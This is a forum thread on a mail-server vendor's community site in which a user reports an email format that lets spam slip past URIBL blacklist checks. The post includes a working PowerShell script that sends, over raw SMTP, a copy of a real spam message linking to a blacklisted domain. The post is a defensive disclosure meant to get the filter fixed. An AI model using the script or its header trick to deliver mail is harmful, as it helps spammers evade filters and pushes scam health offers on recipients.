Arabicالعربية
Chinese (Simplified, China)中文
Chinese (Traditional, Taiwan)中文
Croatianhrvatski
Czechčeština
DutchNederlands
EnglishEnglish
English (United Kingdom)English
Frenchfrançais
French (Canada)français
GermanDeutsch
Hebrewעברית
Hungarianmagyar
Italianitaliano
Persianفارسی
Polishpolski
Portuguese (Brazil)português
Russianрусский
Spanishespañol
Thaiไทย

Home
Knowledge Base
Community

Sticky Duration

Back to Community Threads

2

Email format allows URIBL check bypass and is being used in a new Spam campaign

Problem reported by Steve Norton - 12/18/2020 at 10:46 AM

Submitted

Select a category for your thread.

SmarterMail SmarterMail on Linux BETA SmarterTrack SmarterStats General Discussion Product Tools and Utilities

Hit ENTER after each Tag to add it to your post; Numbers in parentheses represent the Tag's usage.

The following PowerShell script can be used to demonstrate the bypass, the domain 'percassing.eu' is currently on the URIBL blacklist.

#Start

$RemoteHost = "smtpserver.domain.com"
$Port = "25"
$ToAddress = "test.account@domain.com"

$Commands = "EHLO rzone.de",
"MAIL FROM: <>",
"RCPT TO: $ToAddress",
"DATA",
"Subject: Prick Your Finger No More!",
"From: `"Sugar Balance`" <C52V362W86.C52V362W86@barraney.eu>",
<#"MIME-Version: 1.0",#>
"To: $ToAddress",
"Content-Transfer-Encoding: 7bit",
"Content-Type: TEXT/HTml; charset=`"UTF-8`"",
"Date: $(Get-Date -Format "ddd, dd MMM yyyy HH':'mm':'ss") +0000",
"Message-ID: <8a2713f560bf46bc879b3f5e9414b5fb@com>",
"
<html> <body> <center> <A href=`"http://percassing.eu/0mpgc.html?od=1vct5fdb31381da0aojc.2wf4h.Z0000rffjt4c5y2c0_zr883.ffjt4MDEycjUxanNmZW5y0j3dDX`"><FoNT color=red face='Elephant' size='6'>Balance Blood Sugar In Days</FoNT></A><BR> <A href=`"http://percassing.eu/0mpgc.html?od=1vct5fdb31381da0aojc.2wf4h.Z0000rffjt4c5y2c0_zr883.ffjt4MDEycjUxanNmZW5y0j3dDX`"><IMG src=`"http://percassing.eu/18/4526/30096/CHZyCFB.jpg`"></A><BR>
<A href=`"http://percassing.eu/0mpgc.html?od=1out5fdb31381da0a.2wf4h.Z0000rffjt4c5y2c0_zr883.ffjt4MDEycjUxanNmZW5y0u6Nvi`"><IMG src=`"http://percassing.eu/18/4526/30096/UHZyCFB.jpg`"></A><BR> <A href=`"http://percassing.eu/0mpgc.html?od=1outtt5fdb31381da0a.2wf4h.Z0000rffjt4c5y2c0_zr883.ffjt4MDEycjUxanNmZW5y0j3dDX`"><IMG src=`"http://percassing.eu/0mpgc.html?od=8vct5fdb31381da0aojc.2wf4h.Z0000rffjt4c5y2c0_zr883.ffjt4MDEycjUxanNmZW5y0r5djf`"></A><BR> </center> </body> </html>
",
"",
".",
"QUIT"

$Socket = New-Object System.Net.Sockets.TcpClient($RemoteHost, $Port)
if ($Socket)
{
$Stream = $Socket.GetStream()
$Writer = New-Object System.IO.StreamWriter($Stream)
foreach ($Command in $Commands)
{
$Writer.WriteLine($Command)
$Writer.Flush()
Start-Sleep -Milliseconds 2000
}
}
$Socket.Close()

#End

Report Abuse

Offensive Content

Wrong Category

Spam

Back to Community Threads

Please leave this box unchecked

Reply to Thread

Tags

Bypass Spam Checks

Related Knowledge Base Articles

Recommended SPAM SettingsSmarterMail > Antispam and Antivirus

Deploying Rspamd For Use With SmarterMailSmarterMail > Server Configuration and Management

Spam and Security Checks for IPv6 SystemsSmarterMail > Antispam and Antivirus

Configure SmarterMail as a Backup MX ServerSmarterMail > Installation and Configuration

My spool is full of pending messages. What do I do?SmarterMail > Troubleshooting

Ban User

Are you sure you want to ban this user?

Ban IP Address

Are you sure you want to ban this IP Address?

Report

Delete Confirmation

Are you sure you want to delete this item?

Help Desk Software Powered by SmarterTrack

Forgot Login

Trouble logging in? Simply enter your email address OR username in order to reset your password.

For faster and more reliable delivery, add noreply@smartertools.com to your trusted senders list in your email software.

Email Address

Username

Please log in below

Username

Password

Remember Me

Not Logged In

You must be logged in to perform this action.